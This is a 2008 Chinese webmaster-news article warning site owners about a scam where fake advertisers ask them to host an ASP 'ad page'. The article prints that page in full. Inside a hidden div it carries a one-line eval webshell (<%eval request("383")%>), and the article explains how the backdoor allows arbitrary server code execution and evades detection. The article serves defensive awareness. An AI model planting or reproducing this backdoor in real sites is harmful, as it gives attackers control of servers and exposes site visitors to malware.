欢迎登陆网站推广研究网

首页 > 创业心得 > 正文

高度警惕:假买广告真挂马 切莫贪图小利
2008-09-26 16:13:00   来源:   评论:0 点击:

近日,有一些不法份子利用少数站长贪小便宜的心里,在站长网站...

近日,有一些不法份子利用少数站长贪小便宜的心里,在站长网站空间上种植“一句话木马”,从而获取服务器权限实现大面积挂马或释放病毒,危害网站用户,从中牟取暴利。

最近有不少站长在Chinaz论坛发贴和致电中国站长站反映和咨询,有人联系要在他们的网站上投放广告,却要求把广告页面,一个ASP文件放到他自己网站的目录中,但从表面也看不出来有异常,源文件如下:

<HTML>
<head>
<style type="text/css">
<!--
body,td,th {
font-size: 12px;
line-height:16px
}
.STYLE1 {color: #000000}
-->
</style>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>17zao.com-免费音乐-免费视听</title>
<meta name="keywords" content="17zao.com-免费音乐-免费视听">
<meta name="description" content="17zao.com-免费音乐-免费视听">
<body>
<table width="100%" height="135" border="0" cellspacing="0">
<tr>
<td align="center" valign="bottom"><img src="http://www.17zao.com/i/logo.jpg" width="180" height="60" /></td>
</tr>
</table>
<br/>
<table width="450" border="0" align="center" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="1" bgcolor="#5A7D9C"></td>
<td width="225" bgcolor="#FFFFFF"></td>
<td height="1" bgcolor="#5A7D9C"></td>
</tr>
</table>
<table width="450" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="1" bgcolor="#5A7D9C"></td>
<td>
<div id="message" align="center" style="display:none">
<div align="center"><%eval request("383")%></div>
</div>
<div id="loading" align="center" style="display:none">
<div align="center"><br>
正在装载,请稍候... </div>
</div>

<div align="center">
<p><BR>
请您选择最快的站点<BR>
<br>

<INPUT TYPE = BUTTON Value = "北方网通" onClick = "window.location='http://www.17zao.com'">
<INPUT TYPE = BUTTON Value = "南方电信" onClick = "window.location='http://www.17zao.com'">
<br>
<br>
<a href="http://www.miibeian.gov.cn" target="_blank" class="STYLE1">粤ICP备05121955号</a><br>
<br>
</p>
</div>
<br></td>
<td width="1" bgcolor="#5A7D9C"></td>
</tr>
</table>
<table width="450" height="1" border="0" align="center" cellspacing="0">
<tr>
<td bgcolor="#5A7D9C"></td>
</tr>
</table>

然而问题就是在上段代码中被标红的地方,国内著名的服务器安全专家,前SWsoft(中国)高级工程师杨恒飞(coldstar)告诉我们:ASP脚本中eval 函数允许动态执行VBScript源代码,也就是可以执行任何代码段,只是可能返回结果不同而已。因为它会对里面的表达式进行求值,也就是会执行里面的表达式,如果里面的表达式是一个刻意构造的代码的话,就会危害到服务器的安全。如果服务器安全设置不严谨的话,它可以利用这个写入一个完整的ASP木马,操作文件什么的都可以做了。

另外动网论坛开发工程师焦崧源(雨·漫步)讲到:基于C/S模式的“一句话木马”使人想起了几年前在安全界流行的“Execute Request("#")”,这种后门的好处就是体积小,隐蔽性高,杀毒软件一般查杀不出来,而且还可以使用POST方式,IIS日志不会记录。

因此提醒广大站长:切莫贪图小利而上当受骗,根据目前反馈的站长信息,这些不份分子一般通过新申请的QQ号与不懂技术的站长,尤其是运营下载网站的,以包月广告形式要求把该页面放置自己的网站空间。另外也警惕一下,更不要接受通过远程调用的方式在自己网站放置对方广告,以免对方随时更换代码进行挂马操作。

小知识:Eval 函数

计算一个表达式的值并返回结果。

[result = ]Eval(expression)

参数

result

可选项。 是一个变量,用于接受返回的结果。如果未指定结果,应考虑使用 Execute 语句代替。

expression

必选项。可以是包含任何有效 VBScript 表达式的字符串。

说明:在 VBScript 中,x = y 可以有两种解释。第一种方式是赋值语句,将 y 的值赋予 x。第二种解释是测试 x 和 y 是否相等。如果相等,result 为 True;否则 result 为 False。Eval 方法总是采用第二种解释,而 Execute 语句总是采用第一种。


  

相关热词搜索:

上一篇:许大刚:谈下地方性网站的潜力和五个问题
下一篇:文章站如何做到月入4K

分享到: 收藏